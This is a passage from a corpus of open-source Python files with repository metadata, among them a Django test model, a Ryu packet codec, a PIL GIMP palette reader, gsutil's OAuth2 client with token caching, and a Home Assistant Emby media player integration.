self._bounds = zip([-10.0] * self.N, [10.0] * self.N)
self.custom_bounds = ([0, 2], [0, 2])
self.global_optimum = [[1.0, 1.0]]
self.fglob = 0.0
def fun(self, x, *args):
self.nfev += 1
return 100.0 * (x[1] - x[0] ** 3.0) ** 2.0 + (1.0 - x[0]) ** 2.0
|
bsd-3-clause
|
zakuro9715/lettuce
|
tests/integration/lib/Django-1.3/tests/modeltests/str/models.py
|
92
|
1213
|
# -*- coding: utf-8 -*-
"""
2. Adding __str__() or __unicode__() to models
Although it's not a strict requirement, each model should have a
``_str__()`` or ``__unicode__()`` method to return a "human-readable"
representation of the object. Do this not only for your own sanity when dealing
with the interactive prompt, but also because objects' representations are used
throughout Django's automatically-generated admin.
Normally, you should write ``__unicode__()`` method, since this will work for
all field types (and Django will automatically provide an appropriate
``__str__()`` method). However, you can write a ``__str__()`` method directly,
if you prefer. You must be careful to encode the results correctly, though.
"""
from django.db import models
class Article(models.Model):
headline = models.CharField(max_length=100)
pub_date = models.DateTimeField()
def __str__(self):
# Caution: this is only safe if you are certain that headline will be
# in ASCII.
return self.headline
class InternationalArticle(models.Model):
headline = models.CharField(max_length=100)
pub_date = models.DateTimeField()
def __unicode__(self):
return self.headline
|
gpl-3.0
|
macbre/mobify
|
mobify/sources/readthedocs.py
|
1
|
2431
|
"""
Read The Docs materials
https://lasagne.readthedocs.io/en/latest/
"""
import re
from collections import OrderedDict
from mobify.source import MultiChapterSource, MobifySource
def unique(_list):
_dict = OrderedDict()
for item in _list:
_dict[item] = True
return list(_dict.keys())
class ReadTheDocsBookSource(MultiChapterSource):
@staticmethod
def is_my_url(url):
return '.readthedocs.io/' in url
@staticmethod
def get_canonical_url(url):
"""
Covert https://lasagne.readthedocs.io/en/latest/ to https://lasagne.readthedocs.io/
:type url str
:rtype str
"""
matches = re.search(r'//([^.]+).readthedocs.io/', url)
if matches:
return 'https://{}.readthedocs.io/en/latest'.format(matches.group(1))
else:
return url.rstrip('/')
def get_chapters(self):
links = self.tree.xpath('//*[@aria-label="main navigation"]//a')
url = self.get_canonical_url(self._url) + '/'
chapters = [url] + [url + link.attrib.get('href').lstrip('/.').split('#')[0] for link in links]
chapters = unique(chapters)
self._logger.info('Chapters: {}'.format(chapters))
return [ReadTheDocsBookChapter(url=chapter) for chapter in chapters]
class ReadTheDocsBookChapter(MobifySource):
@staticmethod
def is_my_url(url):
"""
This source cannot be created directly from Publisher
"""
raise NotImplementedError
def get_html(self):
content = self.xpath('//*[@class="section"]')
html = self.get_node_html(content)
# remove headers anchor links
html = re.sub(r'<a class="headerlink"[^<]+</a>', '', html, flags=re.MULTILINE)
# cleanup the code snippets
# <span class="p">(</span>
html = re.sub(r'<span class="\w\w?">([^<]+)</span>', r'\1', html, flags=re.MULTILINE)
html = html.replace('<span></span>', '')
# html = re.sub(r'</?(span|a|img|em|div)[^>]*>', '', html)
# print(html) # import sys; sys.exit()
return html.strip()
def get_title(self):
return self.get_node('//h1//text()') or self.get_node('//li/a[contains(@class, "current")]/text()')
def get_author(self):
return self.get_node('//link[@rel="top"]', attr='title') # Lasagne 0.2.dev1 documentation
def get_language(self):
return 'en'
|
mit
|
osrg/ryu
|
ryu/lib/packet/packet.py
|
4
|
6138
|
# Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import struct
import base64
import six
from . import packet_base
from . import ethernet
from ryu import utils
from ryu.lib.stringify import StringifyMixin
# Packet class dictionary
mod = inspect.getmembers(utils.import_module("ryu.lib.packet"),
lambda cls: (inspect.ismodule(cls)))
cls_list = []
for _, m in mod:
cl = inspect.getmembers(m,
lambda cls: (
inspect.isclass(cls) and
issubclass(cls, packet_base.PacketBase)))
cls_list.extend(list(cl))
PKT_CLS_DICT = dict(cls_list)
class Packet(StringifyMixin):
"""A packet decoder/encoder class.
An instance is used to either decode or encode a single packet.
*data* is a bytearray to describe a raw datagram to decode.
When decoding, a Packet object is iteratable.
Iterated values are protocol (ethernet, ipv4, ...) headers and the payload.
Protocol headers are instances of subclass of packet_base.PacketBase.
The payload is a bytearray. They are iterated in on-wire order.
*data* should be omitted when encoding a packet.
"""
# Ignore data field when outputting json representation.
_base_attributes = ['data']
def __init__(self, data=None, protocols=None, parse_cls=ethernet.ethernet):
super(Packet, self).__init__()
self.data = data
if protocols is None:
self.protocols = []
else:
self.protocols = protocols
if self.data:
self._parser(parse_cls)
def _parser(self, cls):
rest_data = self.data
while cls:
# Ignores an empty buffer
if not six.binary_type(rest_data).strip(b'\x00'):
break
try:
proto, cls, rest_data = cls.parser(rest_data)
except struct.error:
break
if proto:
self.protocols.append(proto)
# If rest_data is all padding, we ignore rest_data
if rest_data and six.binary_type(rest_data).strip(b'\x00'):
self.protocols.append(rest_data)
def serialize(self):
"""Encode a packet and store the resulted bytearray in self.data.
This method is legal only when encoding a packet.
"""
self.data = bytearray()
r = self.protocols[::-1]
for i, p in enumerate(r):
if isinstance(p, packet_base.PacketBase):
if i == len(r) - 1:
prev = None
else:
prev = r[i + 1]
data = p.serialize(self.data, prev)
else:
data = six.binary_type(p)
self.data = bytearray(data + self.data)
@classmethod
def from_jsondict(cls, dict_, decode_string=base64.b64decode,
**additional_args):
protocols = []
for proto in dict_['protocols']:
for key, value in proto.items():
if key in PKT_CLS_DICT:
pkt_cls = PKT_CLS_DICT[key]
protocols.append(pkt_cls.from_jsondict(value))
else:
raise ValueError('unknown protocol name %s' % key)
return cls(protocols=protocols)
def add_protocol(self, proto):
"""Register a protocol *proto* for this packet.
This method is legal only when encoding a packet.
When encoding a packet, register a protocol (ethernet, ipv4, ...)
header to add to this packet.
Protocol headers should be registered in on-wire order before calling
self.serialize.
"""
self.protocols.append(proto)
def get_protocols(self, protocol):
"""Returns a list of protocols that matches to the specified protocol.
"""
if isinstance(protocol, packet_base.PacketBase):
protocol = protocol.__class__
assert issubclass(protocol, packet_base.PacketBase)
return [p for p in self.protocols if isinstance(p, protocol)]
def get_protocol(self, protocol):
"""Returns the firstly found protocol that matches to the
specified protocol.
"""
result = self.get_protocols(protocol)
if len(result) > 0:
return result[0]
return None
def __div__(self, trailer):
self.add_protocol(trailer)
return self
def __truediv__(self, trailer):
return self.__div__(trailer)
def __iter__(self):
return iter(self.protocols)
def __getitem__(self, idx):
return self.protocols[idx]
def __setitem__(self, idx, item):
self.protocols[idx] = item
def __delitem__(self, idx):
del self.protocols[idx]
def __len__(self):
return len(self.protocols)
def __contains__(self, protocol):
if (inspect.isclass(protocol) and
issubclass(protocol, packet_base.PacketBase)):
return protocol in [p.__class__ for p in self.protocols]
return protocol in self.protocols
def __str__(self):
return ', '.join(repr(protocol) for protocol in self.protocols)
__repr__ = __str__ # note: str(list) uses __repr__ for elements
# XXX: Hack for preventing recursive import
def _PacketBase__div__(self, trailer):
pkt = Packet()
pkt.add_protocol(self)
pkt.add_protocol(trailer)
return pkt
packet_base.PacketBase.__div__ = _PacketBase__div__
packet_base.PacketBase.__truediv__ = _PacketBase__div__
|
apache-2.0
|
zhaochl/python-utils
|
verify_code/Imaging-1.1.7/PIL/GimpPaletteFile.py
|
40
|
1337
|
#
# Python Imaging Library
# $Id$
#
# stuff to read GIMP palette files
#
# History:
# 1997-08-23 fl Created
# 2004-09-07 fl Support GIMP 2.0 palette files.
#
# Copyright (c) Secret Labs AB 1997-2004. All rights reserved.
# Copyright (c) Fredrik Lundh 1997-2004.
#
# See the README file for information on usage and redistribution.
#
import re, string
##
# File handler for GIMP's palette format.
class GimpPaletteFile:
rawmode = "RGB"
def __init__(self, fp):
self.palette = map(lambda i: chr(i)*3, range(256))
if fp.readline()[:12] != "GIMP Palette":
raise SyntaxError, "not a GIMP palette file"
i = 0
while i <= 255:
s = fp.readline()
if not s:
break
# skip fields and comment lines
if re.match("\w+:|#", s):
continue
if len(s) > 100:
raise SyntaxError, "bad palette file"
v = tuple(map(int, string.split(s)[:3]))
if len(v) != 3:
raise ValueError, "bad palette entry"
if 0 <= i <= 255:
self.palette[i] = chr(v[0]) + chr(v[1]) + chr(v[2])
i = i + 1
self.palette = string.join(self.palette, "")
def getpalette(self):
return self.palette, self.rawmode
|
apache-2.0
|
yetu/repotools
|
third_party/gsutil/oauth2_plugin/oauth2_client.py
|
45
|
22215
|
# Copyright 2010 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An OAuth2 client library.
This library provides a client implementation of the OAuth2 protocol (see
http://code.google.com/apis/accounts/docs/OAuth2.html).
**** Experimental API ****
This module is experimental and is subject to modification or removal without
notice.
"""
# This implementation is inspired by the implementation in
# http://code.google.com/p/google-api-python-client/source/browse/oauth2client/,
# with the following main differences:
# - This library uses the fancy_urllib monkey patch for urllib to correctly
# implement SSL certificate validation.
# - This library does not assume that client code is using the httplib2 library
# to make HTTP requests.
# - This library implements caching of access tokens independent of refresh
# tokens (in the python API client oauth2client, there is a single class that
# encapsulates both refresh and access tokens).
import cgi
import datetime
import errno
from hashlib import sha1
import logging
import os
import tempfile
import threading
import urllib
import urllib2
import urlparse
from boto import cacerts
from third_party import fancy_urllib
try:
import json
except ImportError:
try:
# Try to import from django, should work on App Engine
from django.utils import simplejson as json
except ImportError:
# Try for simplejson
import simplejson as json
LOG = logging.getLogger('oauth2_client')
# Lock used for checking/exchanging refresh token, so multithreaded
# operation doesn't attempt concurrent refreshes.
token_exchange_lock = threading.Lock()
class Error(Exception):
"""Base exception for the OAuth2 module."""
pass
class AccessTokenRefreshError(Error):
"""Error trying to exchange a refresh token into an access token."""
pass
class AuthorizationCodeExchangeError(Error):
"""Error trying to exchange an authorization code into a refresh token."""
pass
class TokenCache(object):
"""Interface for OAuth2 token caches."""
def PutToken(self, key, value):
raise NotImplementedError
def GetToken(self, key):
raise NotImplementedError
class NoopTokenCache(TokenCache):
"""A stub implementation of TokenCache that does nothing."""
def PutToken(self, key, value):
pass
def GetToken(self, key):
return None
class InMemoryTokenCache(TokenCache):
"""An in-memory token cache.
The cache is implemented by a python dict, and inherits the thread-safety
properties of dict.
"""
def __init__(self):
super(InMemoryTokenCache, self).__init__()
self.cache = dict()
def PutToken(self, key, value):
LOG.info('InMemoryTokenCache.PutToken: key=%s', key)
self.cache[key] = value
def GetToken(self, key):
value = self.cache.get(key, None)
LOG.info('InMemoryTokenCache.GetToken: key=%s%s present',
key, ' not' if value is None else '')
return value
class FileSystemTokenCache(TokenCache):
"""An implementation of a token cache that persists tokens on disk.
Each token object in the cache is stored in serialized form in a separate
file. The cache file's name can be configured via a path pattern that is
parameterized by the key under which a value is cached and optionally the
current processes uid as obtained by os.getuid().
Since file names are generally publicly visible in the system, it is important
that the cache key does not leak information about the token's value. If
client code computes cache keys from token values, a cryptographically strong
one-way function must be used.
"""
def __init__(self, path_pattern=None):
"""Creates a FileSystemTokenCache.
Args:
path_pattern: Optional string argument to specify the path pattern for
cache files. The argument should be a path with format placeholders
'%(key)s' and optionally '%(uid)s'. If the argument is omitted, the
default pattern
<tmpdir>/oauth2client-tokencache.%(uid)s.%(key)s
is used, where <tmpdir> is replaced with the system temp dir as
obtained from tempfile.gettempdir().
"""
super(FileSystemTokenCache, self).__init__()
self.path_pattern = path_pattern
if not path_pattern:
self.path_pattern = os.path.join(
tempfile.gettempdir(), 'oauth2_client-tokencache.%(uid)s.%(key)s')
def CacheFileName(self, key):
uid = '_'
try:
# os.getuid() doesn't seem to work in Windows
uid = str(os.getuid())
except:
pass
return self.path_pattern % {'key': key, 'uid': uid}
def PutToken(self, key, value):
"""Serializes the value to the key's filename.
To ensure that written tokens aren't leaked to a different users, we
a) unlink an existing cache file, if any (to ensure we don't fall victim
to symlink attacks and the like),
b) create a new file with O_CREAT | O_EXCL (to ensure nobody is trying to
race us)
If either of these steps fail, we simply give up (but log a warning). Not
caching access tokens is not catastrophic, and failure to create a file
can happen for either of the following reasons:
- someone is attacking us as above, in which case we want to default to
safe operation (not write the token);
- another legitimate process is racing us; in this case one of the two
will win and write the access token, which is fine;
- we don't have permission to remove the old file or write to the
specified directory, in which case we can't recover
Args:
key: the refresh_token hash key to store.
value: the access_token value to serialize.
"""
cache_file = self.CacheFileName(key)
LOG.info('FileSystemTokenCache.PutToken: key=%s, cache_file=%s',
key, cache_file)
try:
os.unlink(cache_file)
except:
# Ignore failure to unlink the file; if the file exists and can't be
# unlinked, the subsequent open with O_CREAT | O_EXCL will fail.
pass
flags = os.O_RDWR | os.O_CREAT | os.O_EXCL
# Accommodate Windows; stolen from python2.6/tempfile.py.
if hasattr(os, 'O_NOINHERIT'):
flags |= os.O_NOINHERIT
if hasattr(os, 'O_BINARY'):
flags |= os.O_BINARY
try:
fd = os.open(cache_file, flags, 0600)
except (OSError, IOError), e:
LOG.warning('FileSystemTokenCache.PutToken: '
'Failed to create cache file %s: %s', cache_file, e)
return
f = os.fdopen(fd, 'w+b')
f.write(value.Serialize())
f.close()
def GetToken(self, key):
"""Returns a deserialized access token from the key's filename."""
value = None
cache_file = self.CacheFileName(key)
try:
f = open(cache_file)
value = AccessToken.UnSerialize(f.read())
f.close()
except (IOError, OSError), e:
if e.errno != errno.ENOENT:
LOG.warning('FileSystemTokenCache.GetToken: '
'Failed to read cache file %s: %s', cache_file, e)
except Exception, e:
LOG.warning('FileSystemTokenCache.GetToken: '
'Failed to read cache file %s (possibly corrupted): %s',
cache_file, e)
LOG.info('FileSystemTokenCache.GetToken: key=%s%s present (cache_file=%s)',
key, ' not' if value is None else '', cache_file)
return value
class OAuth2Provider(object):
"""Encapsulates information about an OAuth2 provider."""
def __init__(self, label, authorization_uri, token_uri):
"""Creates an OAuth2Provider.
Args:
label: A string identifying this oauth2 provider, e.g. "Google".
authorization_uri: The provider's authorization URI.
token_uri: The provider's token endpoint URI.
"""
self.label = label
self.authorization_uri = authorization_uri
self.token_uri = token_uri
class OAuth2Client(object):
"""An OAuth2 client."""
def __init__(self, provider, client_id, client_secret,
url_opener=None,
proxy=None,
access_token_cache=None,
datetime_strategy=datetime.datetime):
"""Creates an OAuth2Client.
Args:
provider: The OAuth2Provider provider this client will authenticate
against.
client_id: The OAuth2 client ID of this client.
client_secret: The OAuth2 client secret of this client.
url_opener: An optinal urllib2.OpenerDirector to use for making HTTP
requests to the OAuth2 provider's token endpoint. The provided
url_opener *must* be configured to validate server SSL certificates
for requests to https connections, and to correctly handle proxying of
https requests. If this argument is omitted or None, a suitable
opener based on fancy_urllib is used.
proxy: An optional string specifying a HTTP proxy to be used, in the form
'<proxy>:<port>'. This option is only effective if the url_opener has
been configured with a fancy_urllib.FancyProxyHandler (this is the
case for the default url_opener).
access_token_cache: An optional instance of a TokenCache. If omitted or
None, an InMemoryTokenCache is used.
datetime_strategy: datetime module strategy to use.
"""
self.provider = provider
self.client_id = client_id
self.client_secret = client_secret
# datetime_strategy is used to invoke utcnow() on; it is injected into the
# constructor for unit testing purposes.
self.datetime_strategy = datetime_strategy
self._proxy = proxy
self.access_token_cache = access_token_cache or InMemoryTokenCache()
self.ca_certs_file = os.path.join(
os.path.dirname(os.path.abspath(cacerts.__file__)), 'cacerts.txt')
if url_opener is None:
# TODO(Google): set user agent?
url_opener = urllib2.build_opener(
fancy_urllib.FancyProxyHandler(),
fancy_urllib.FancyRedirectHandler(),
fancy_urllib.FancyHTTPSHandler())
self.url_opener = url_opener
def _TokenRequest(self, request):
"""Make a requst to this client's provider's token endpoint.
Args:
request: A dict with the request parameteres.
Returns:
A tuple (response, error) where,
- response is the parsed JSON response received from the token endpoint,
or None if no parseable response was received, and
- error is None if the request succeeded or
an Exception if an error occurred.
"""
body = urllib.urlencode(request)
LOG.debug('_TokenRequest request: %s', body)
response = None
try:
request = fancy_urllib.FancyRequest(
self.provider.token_uri, data=body)
if self._proxy:
request.set_proxy(self._proxy, 'http')
request.set_ssl_info(ca_certs=self.ca_certs_file)
result = self.url_opener.open(request)
resp_body = result.read()
LOG.debug('_TokenRequest response: %s', resp_body)
except urllib2.HTTPError, e:
try:
response = json.loads(e.read())
except:
pass
return (response, e)
try:
response = json.loads(resp_body)
except ValueError, e:
return (None, e)
return (response, None)
def GetAccessToken(self, refresh_token):
"""Given a RefreshToken, obtains a corresponding access token.
First, this client's access token cache is checked for an existing,
not-yet-expired access token for the provided refresh token. If none is
found, the client obtains a fresh access token for the provided refresh
token from the OAuth2 provider's token endpoint.
Args:
refresh_token: The RefreshToken object which to get an access token for.
Returns:
The cached or freshly obtained AccessToken.
Raises:
AccessTokenRefreshError if an error occurs.
"""
# Ensure only one thread at a time attempts to get (and possibly refresh)
# the access token. This doesn't prevent concurrent refresh attempts across
# multiple gsutil instances, but at least protects against multiple threads
# simultaneously attempting to refresh when gsutil -m is used.
token_exchange_lock.acquire()
try:
cache_key = refresh_token.CacheKey()
LOG.info('GetAccessToken: checking cache for key %s', cache_key)
access_token = self.access_token_cache.GetToken(cache_key)
LOG.debug('GetAccessToken: token from cache: %s', access_token)
if access_token is None or access_token.ShouldRefresh():
LOG.info('GetAccessToken: fetching fresh access token...')
access_token = self.FetchAccessToken(refresh_token)
LOG.debug('GetAccessToken: fresh access token: %s', access_token)
self.access_token_cache.PutToken(cache_key, access_token)
return access_token
finally:
token_exchange_lock.release()
def FetchAccessToken(self, refresh_token):
"""Fetches an access token from the provider's token endpoint.
Given a RefreshToken, fetches an access token from this client's OAuth2
provider's token endpoint.
Args:
refresh_token: The RefreshToken object which to get an access token for.
Returns:
The fetched AccessToken.
Raises:
AccessTokenRefreshError: if an error occurs.
"""
request = {
'grant_type': 'refresh_token',
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': refresh_token.refresh_token,
}
LOG.debug('FetchAccessToken request: %s', request)
response, error = self._TokenRequest(request)
LOG.debug(
'FetchAccessToken response (error = %s): %s', error, response)
if error:
oauth2_error = ''
if response and response['error']:
oauth2_error = '; OAuth2 error: %s' % response['error']
raise AccessTokenRefreshError(
'Failed to exchange refresh token into access token; '
'request failed: %s%s' % (error, oauth2_error))
if 'access_token' not in response:
raise AccessTokenRefreshError(
'Failed to exchange refresh token into access token; response: %s' %
response)
token_expiry = None
if 'expires_in' in response:
token_expiry = (
self.datetime_strategy.utcnow() +
datetime.timedelta(seconds=int(response['expires_in'])))
return AccessToken(response['access_token'], token_expiry,
datetime_strategy=self.datetime_strategy)
def GetAuthorizationUri(self, redirect_uri, scopes, extra_params=None):
"""Gets the OAuth2 authorization URI and the specified scope(s).
Applications should navigate/redirect the user's user agent to this URI. The
user will be shown an approval UI requesting the user to approve access of
this client to the requested scopes under the identity of the authenticated
end user.
The application should expect the user agent to be redirected to the
specified redirect_uri after the user's approval/disapproval.
Installed applications may use the special redirect_uri
'urn:ietf:wg:oauth:2.0:oob' to indicate that instead of redirecting the
browser, the user be shown a confirmation page with a verification code.
The application should query the user for this code.
Args:
redirect_uri: Either the string 'urn:ietf:wg:oauth:2.0:oob' for a
non-web-based application, or a URI that handles the callback from the
authorization server.
scopes: A list of strings specifying the OAuth scopes the application
requests access to.
extra_params: Optional dictionary of additional parameters to be passed to
the OAuth2 authorization URI.
Returns:
The authorization URI for the specified scopes as a string.
"""
request = {
'response_type': 'code',
'client_id': self.client_id,
'redirect_uri': redirect_uri,
'scope': ' '.join(scopes),
}
if extra_params:
request.update(extra_params)
url_parts = list(urlparse.urlparse(self.provider.authorization_uri))
# 4 is the index of the query part
request.update(dict(cgi.parse_qsl(url_parts[4])))
url_parts[4] = urllib.urlencode(request)
return urlparse.urlunparse(url_parts)
def ExchangeAuthorizationCode(self, code, redirect_uri, scopes):
"""Exchanges an authorization code for a refresh token.
Invokes this client's OAuth2 provider's token endpoint to exchange an
authorization code into a refresh token.
Args:
code: the authrorization code.
redirect_uri: Either the string 'urn:ietf:wg:oauth:2.0:oob' for a
non-web-based application, or a URI that handles the callback from the
authorization server.
scopes: A list of strings specifying the OAuth scopes the application
requests access to.
Returns:
A tuple consting of the resulting RefreshToken and AccessToken.
Raises:
AuthorizationCodeExchangeError: if an error occurs.
"""
request = {
'grant_type': 'authorization_code',
'client_id': self.client_id,
'client_secret': self.client_secret,
'code': code,
'redirect_uri': redirect_uri,
'scope': ' '.join(scopes),
}
LOG.debug('ExchangeAuthorizationCode request: %s', request)
response, error = self._TokenRequest(request)
LOG.debug(
'ExchangeAuthorizationCode response (error = %s): %s',
error, response)
if error:
oauth2_error = ''
if response and response['error']:
oauth2_error = '; OAuth2 error: %s' % response['error']
raise AuthorizationCodeExchangeError(
'Failed to exchange refresh token into access token; '
'request failed: %s%s' % (str(error), oauth2_error))
if not 'access_token' in response:
raise AuthorizationCodeExchangeError(
'Failed to exchange authorization code into access token; '
'response: %s' % response)
token_expiry = None
if 'expires_in' in response:
token_expiry = (
self.datetime_strategy.utcnow() +
datetime.timedelta(seconds=int(response['expires_in'])))
access_token = AccessToken(response['access_token'], token_expiry,
datetime_strategy=self.datetime_strategy)
refresh_token = None
refresh_token_string = response.get('refresh_token', None)
token_exchange_lock.acquire()
try:
if refresh_token_string:
refresh_token = RefreshToken(self, refresh_token_string)
self.access_token_cache.PutToken(refresh_token.CacheKey(), access_token)
finally:
token_exchange_lock.release()
return (refresh_token, access_token)
class AccessToken(object):
"""Encapsulates an OAuth2 access token."""
def __init__(self, token, expiry, datetime_strategy=datetime.datetime):
self.token = token
self.expiry = expiry
self.datetime_strategy = datetime_strategy
@staticmethod
def UnSerialize(query):
"""Creates an AccessToken object from its serialized form."""
def GetValue(d, key):
return (d.get(key, [None]))[0]
kv = cgi.parse_qs(query)
if not kv['token']:
return None
expiry = None
expiry_tuple = GetValue(kv, 'expiry')
if expiry_tuple:
try:
expiry = datetime.datetime(
*[int(n) for n in expiry_tuple.split(',')])
except:
return None
return AccessToken(GetValue(kv, 'token'), expiry)
def Serialize(self):
"""Serializes this object as URI-encoded key-value pairs."""
# There's got to be a better way to serialize a datetime. Unfortunately,
# there is no reliable way to convert into a unix epoch.
kv = {'token': self.token}
if self.expiry:
t = self.expiry
tupl = (t.year, t.month, t.day, t.hour, t.minute, t.second, t.microsecond)
kv['expiry'] = ','.join([str(i) for i in tupl])
return urllib.urlencode(kv)
def ShouldRefresh(self, time_delta=300):
"""Whether the access token needs to be refreshed.
Args:
time_delta: refresh access token when it expires within time_delta secs.
Returns:
True if the token is expired or about to expire, False if the
token should be expected to work. Note that the token may still
be rejected, e.g. if it has been revoked server-side.
"""
if self.expiry is None:
return False
return (self.datetime_strategy.utcnow()
+ datetime.timedelta(seconds=time_delta) > self.expiry)
def __eq__(self, other):
return self.token == other.token and self.expiry == other.expiry
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return 'AccessToken(token=%s, expiry=%sZ)' % (self.token, self.expiry)
class RefreshToken(object):
"""Encapsulates an OAuth2 refresh token."""
def __init__(self, oauth2_client, refresh_token):
self.oauth2_client = oauth2_client
self.refresh_token = refresh_token
def CacheKey(self):
"""Computes a cache key for this refresh token.
The cache key is computed as the SHA1 hash of the token, and as such
satisfies the FileSystemTokenCache requirement that cache keys do not leak
information about token values.
Returns:
A hash key for this refresh token.
"""
h = sha1()
h.update(self.refresh_token)
return h.hexdigest()
def GetAuthorizationHeader(self):
"""Gets the access token HTTP authorication header value.
Returns:
The value of an Authorization HTTP header that authenticates
requests with an OAuth2 access token based on this refresh token.
"""
return 'Bearer %s' % self.oauth2_client.GetAccessToken(self).token
|
bsd-3-clause
|
ewandor/home-assistant
|
homeassistant/components/media_player/emby.py
|
4
|
11094
|
"""
Support to interface with the Emby API.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.emby/
"""
import asyncio
import logging
import voluptuous as vol
from homeassistant.components.media_player import (
MEDIA_TYPE_TVSHOW, MEDIA_TYPE_VIDEO, MEDIA_TYPE_MUSIC, SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE, SUPPORT_SEEK, SUPPORT_STOP, SUPPORT_PREVIOUS_TRACK,
MediaPlayerDevice, SUPPORT_PLAY, PLATFORM_SCHEMA)
from homeassistant.const import (
STATE_IDLE, STATE_OFF, STATE_PAUSED, STATE_PLAYING,
CONF_HOST, CONF_PORT, CONF_SSL, CONF_API_KEY, DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP)
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
REQUIREMENTS = ['pyemby==1.4']
_LOGGER = logging.getLogger(__name__)
CONF_AUTO_HIDE = 'auto_hide'
MEDIA_TYPE_TRAILER = 'trailer'
MEDIA_TYPE_GENERIC_VIDEO = 'video'
DEFAULT_HOST = 'localhost'
DEFAULT_PORT = 8096
DEFAULT_SSL_PORT = 8920
DEFAULT_SSL = False
DEFAULT_AUTO_HIDE = False
_LOGGER = logging.getLogger(__name__)
SUPPORT_EMBY = SUPPORT_PAUSE | SUPPORT_PREVIOUS_TRACK | SUPPORT_NEXT_TRACK | \
SUPPORT_STOP | SUPPORT_SEEK | SUPPORT_PLAY
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_SSL, default=DEFAULT_SSL): cv.boolean,
vol.Required(CONF_API_KEY): cv.string,
vol.Optional(CONF_PORT, default=None): cv.port,
vol.Optional(CONF_AUTO_HIDE, default=DEFAULT_AUTO_HIDE): cv.boolean,
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Set up the Emby platform."""
from pyemby import EmbyServer
host = config.get(CONF_HOST)
key = config.get(CONF_API_KEY)
port = config.get(CONF_PORT)
ssl = config.get(CONF_SSL)
auto_hide = config.get(CONF_AUTO_HIDE)
if port is None:
port = DEFAULT_SSL_PORT if ssl else DEFAULT_PORT
_LOGGER.debug("Setting up Emby server at: %s:%s", host, port)
emby = EmbyServer(host, key, port, ssl, hass.loop)
active_emby_devices = {}
inactive_emby_devices = {}
@callback
def device_update_callback(data):
"""Handle devices which are added to Emby."""
new_devices = []
active_devices = []
for dev_id in emby.devices:
active_devices.append(dev_id)
if dev_id not in active_emby_devices and \
dev_id not in inactive_emby_devices:
new = EmbyDevice(emby, dev_id)
active_emby_devices[dev_id] = new
new_devices.append(new)
elif dev_id in inactive_emby_devices:
if emby.devices[dev_id].state != 'Off':
add = inactive_emby_devices.pop(dev_id)
active_emby_devices[dev_id] = add
_LOGGER.debug("Showing %s, item: %s", dev_id, add)
add.set_available(True)
add.set_hidden(False)
if new_devices:
_LOGGER.debug("Adding new devices: %s", new_devices)
async_add_devices(new_devices, update_before_add=True)
@callback
def device_removal_callback(data):
"""Handle the removal of devices from Emby."""
if data in active_emby_devices:
rem = active_emby_devices.pop(data)
inactive_emby_devices[data] = rem
_LOGGER.debug("Inactive %s, item: %s", data, rem)
rem.set_available(False)
if auto_hide:
rem.set_hidden(True)
@callback
def start_emby(event):
"""Start Emby connection."""
emby.start()
@asyncio.coroutine
def stop_emby(event):
"""Stop Emby connection."""
yield from emby.stop()
emby.add_new_devices_callback(device_update_callback)
emby.add_stale_devices_callback(device_removal_callback)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_START, start_emby)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_emby)
class EmbyDevice(MediaPlayerDevice):
"""Representation of an Emby device."""
def __init__(self, emby, device_id):
"""Initialize the Emby device."""
_LOGGER.debug("New Emby Device initialized with ID: %s", device_id)
self.emby = emby
self.device_id = device_id
self.device = self.emby.devices[self.device_id]
self._hidden = False
self._available = True
self.media_status_last_position = None
self.media_status_received = None
@asyncio.coroutine
def async_added_to_hass(self):
"""Register callback."""
self.emby.add_update_callback(
self.async_update_callback, self.device_id)
@callback
def async_update_callback(self, msg):
"""Handle device updates."""
# Check if we should update progress
if self.device.media_position:
if self.device.media_position != self.media_status_last_position:
self.media_status_last_position = self.device.media_position
self.media_status_received = dt_util.utcnow()
elif not self.device.is_nowplaying:
# No position, but we have an old value and are still playing
self.media_status_last_position = None
self.media_status_received = None
self.async_schedule_update_ha_state()
@property
def hidden(self):
"""Return True if entity should be hidden from UI."""
return self._hidden
def set_hidden(self, value):
"""Set hidden property."""
self._hidden = value
@property
def available(self):
"""Return True if entity is available."""
return self._available
def set_available(self, value):
"""Set available property."""
self._available = value
@property
def unique_id(self):
"""Return the id of this emby client."""
return '{}.{}'.format(self.__class__, self.device_id)
@property
def supports_remote_control(self):
"""Return control ability."""
return self.device.supports_remote_control
@property
def name(self):
"""Return the name of the device."""
return 'Emby - {} - {}'.format(self.device.client, self.device.name) \
or DEVICE_DEFAULT_NAME
@property
def should_poll(self):
"""Return True if entity has to be polled for state."""
return False
@property
def state(self):
"""Return the state of the device."""
state = self.device.state
if state == 'Paused':
return STATE_PAUSED
elif state == 'Playing':
return STATE_PLAYING
elif state == 'Idle':
return STATE_IDLE
elif state == 'Off':
return STATE_OFF
@property
def app_name(self):
"""Return current user as app_name."""
# Ideally the media_player object would have a user property.
return self.device.username
@property
def media_content_id(self):
"""Content ID of current playing media."""
return self.device.media_id
@property
def media_content_type(self):
"""Content type of current playing media."""
